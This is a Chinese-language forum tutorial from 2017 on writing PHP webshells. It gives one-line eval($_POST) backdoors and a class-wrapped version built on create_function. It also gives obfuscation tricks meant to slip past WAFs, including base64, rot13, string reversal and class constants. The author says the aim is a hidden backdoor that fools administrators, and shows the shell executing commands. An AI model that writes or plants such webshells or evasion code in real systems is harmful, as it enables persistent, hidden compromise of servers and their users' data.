本帖最后由 xoanHn 于 2017-11-6 11:02 编辑

精华篇webshell在php方向的研究·不要错过篇

本文原创作者：原名xoanHn)，个人站点：www.laimooc.cn。

本文属i春秋原创奖励计划，未经许可禁止转载

文章主旨：准备学习c语言，你喜欢的所有干货在文末附件里

作者宗旨：没有不想当将军的兵，没有不想提高技术的person，今天带你打开php的研究之路。

前几篇帖子：

timg.jpg (151.99 KB, 下载次数: 48)

2017-11-5 18:17 上传

本来打算写一个综合性的PHP脚本文件(修改文件内容、复制文件、删除文件、创建文件、目录遍历等；执行系统命令；文件的上传；文件内容的加解密或者编解码；增删改查数据库；劫持登陆表单等一些操作)。发现这个需要花费很多的时间来调试，况且这些模块的分割拆解网上已经有了一些，所以，就到此为止。

本次发表文章，主要是围绕：类的封装、构造函数以及perl-Class常量的使用、编码解码等，来与常规的结合，进行制作webshell。

最基础的webshell，莫过于：

[AppleScript] 纯文本查看 复制代码【php eval($_POST[‘0’]);】,或者还有最短的吧

【eval($_POST[1]);】

。

那么我研究的初衷：1、是因为最短的一句话，会被很多的waf等直接拦截2、我想留下比较隐蔽并且容易忽悠管理员的后门3、我想锻炼一下自己的php掌握与使用能力4、为了给我们的开发团队督导一下安全编程思想。

最基础的类 ：

[AppleScript] 纯文本查看 复制代码Class classname

{

}

深入一点那么就是如下：

[AppleScript] 纯文本查看 复制代码Class classname

{

Function operation(){ }

}

实例化：

$a = new classname();

$a -> operation();

嗯，是的就是如此，很常见的类。

timg.jpg (116.25 KB, 下载次数: 58)

2017-11-5 18:19 上传

看看perl-class呢：

[AppleScript] 纯文本查看 复制代码class math{

const pi = 3.14159;

}

echo math::pi. "\n";

就是上面如此，::操作符来访问perl-clas常量。我们调试一下perl-class试试看：

image001.png (28.93 KB, 下载次数: 75)

2017-11-5 17:10 上传

神奇吧，我也这么觉得，php真的很让我开心Ilove her ！

那么我们现在用perlclass，来做一个webshell试试看呗：

[AppleScript] 纯文本查看 复制代码<?php

error_reporting(0);

//perl-Class 思想

class math{

const pi = 3.14159;

}

echo "Math::pi=" .math::pi. "\n";

const pi 这是我们的perl-class常量，在class中声明，然后类外::操作符进行常量引用。那么我们先修改pi为base64_decode，你感觉会实现吗，会不会因为是字符串然后error呢，不用怕，走起来看看吧，咱们有万能的echo：

image003.png (30.31 KB, 下载次数: 71)

2017-11-5 17:10 上传

使用试试看，其实学习吧，就是不要拘束，我的引路人给了很大的鼓励，是我的榜样：

image005.png (30.74 KB, 下载次数: 70)

2017-11-5 17:10 上传

在使用这个编码的时候，我心里在想也可以使用url编码、者rot13编码、反转、字符串拼接、字符串的拆分利用(如：explode)、字符串的查找替换(如：substr)、quoted-printable字符串转换利用等等，更多的请参考:http://php.net/ref.strings如下，自己在这块调试的一个一句话：

perl.png (45.13 KB, 下载次数: 46)

2017-11-6 11:54 上传

下面我们来讲解一下，类的封装来制作一句话：

先来一个成品如下图示，点击我，显示源码：

image007.png (132.87 KB, 下载次数: 58)

2017-11-5 17:10 上传

对不起，再点击，也显示不了源码。

前面我们说过了类的原型，那么下面我们试试：

[AppleScript] 纯文本查看 复制代码class a{

function create_fun($data)

{

$post= create_function('', $data);

$post();

}

}

我们外部类，内部调用了动态创建函数，来为下一步的webshell做铺垫，然后我们来实例化吧：

$a = new a();

这句就是实例化，简答吧，要记住了new 来实例化的，那么我们下面来引用，前面我们在类的内部定义了一个create_fun ，我们在这里使用它即可，如下，

$a ->create_fun($shell);

那么到这里了，是不是还少个东西，看出来了大伙，参数噻，下面我们简单的定义参数呗:直接一句话，哈哈，简单暴力。

$shell ="eval($_POST[c]);";

那么现在整理就完成了，类的封装来实现一句话的，测试看看：

image009.png (45.73 KB, 下载次数: 47)

2017-11-5 17:10 上传

执行命令是可以的。就是这样吧。

image011.png (83.14 KB, 下载次数: 47)

2017-11-5 17:10 上传

可以看到我们的phpinfo() 也是可以的。

image013.gif (935.71 KB, 下载次数: 80)

2017-11-5 17:10 上传

最后，说一说，如何结合构造函数来生成一句话的，其实如果善于调试的话，我们的研究到这里应该已经结束了。

但是为了多讲几句，我还是留下了，先演示一下，如何反转字符串，这点让我感觉php神奇的一匹马：

[AppleScript] 纯文本查看 复制代码function reverse_chr($str){

for($i=1;$i<=strlen($str);$i++){

$strr= substr($str,-$i,1);

echo $strr;

}

return;

}

这段足够代码实现，哈哈哈，其实还可以更见简短一些一个单词的事情：strrev ，这个函数你别看小，它的威力很强大，自行联想。

image014.gif (455.87 KB, 下载次数: 101)

2017-11-5 17:10 上传

这个反转函数，怎么用，一句话：慢慢来，多使用，大佬们传授的经验。授之以鱼，不如授之以渔。你们长大了，成功了，分我们一碗汤喝就可以。

image015.png (27.61 KB, 下载次数: 45)

2017-11-5 17:10 上传

好了吧，不扯了，颈椎痛，大家平时要注意锻炼身体。

下面这张图，我敢保证，让你感到惊喜又兴奋！

image017.png (45.45 KB, 下载次数: 56)

2017-11-5 17:10 上传

最后一次对php在webshell方面的研究到此结束。准备去学习c语言了。

所有的附件我会打包，不再隐藏,表哥表姐们回复一下，举手之劳，thank you very much。

pack.zip

(1.36 KB, 下载次数: 56)

2017-11-5 17:11 上传

点击文件名下载附件

下载积分: 魔法币 -5

timg.jpg (530.27 KB, 下载次数: 50)

2017-11-5 18:20 上传